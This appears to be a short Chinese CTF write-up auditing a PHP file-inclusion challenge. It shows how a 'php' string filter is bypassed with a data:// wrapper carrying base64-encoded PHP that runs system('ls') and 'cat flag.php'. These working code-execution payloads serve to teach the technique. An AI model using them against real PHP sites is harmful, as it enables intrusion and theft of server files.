1. 代码审计 

    1. <?php
    2. if(isset($_GET['file'])){
    3. $file = $_GET['file'];
    4. $file = str_replace("php", "???", $file);
    5. //这里对file变量里的php替换成???
    6. include($file);
    7. }else{
    8. highlight_file(__FILE__);
    9. }

  2. 这里对变量里的php进行了过滤,所以不能考虑php伪协议,考虑用data伪协议进行读取
    ```shell ?file=data://text/plain;base64,<?php system(‘ls’);?>

base64进行编码

?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdscycpOz8%2b

![image-20210609085508674.png](https://cdn.nlark.com/yuque/0/2021/png/12378991/1623200410839-f09ce9a0-b51e-4cd2-8107-1a258fc950d5.png#clientId=ud50d79ac-07a8-4&from=ui&id=u26a08d5e&margin=%5Bobject%20Object%5D&name=image-20210609085508674.png&originHeight=658&originWidth=2088&originalType=binary&ratio=2&size=191880&status=done&style=none&taskId=u9f0ffd46-bc72-4b4b-bf90-f72112e5ee8)
```shell
?file=data://text/plain;base64,<?php system('cat flag.php');?>

#base64进行编码
?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==

image-20210609085828866.png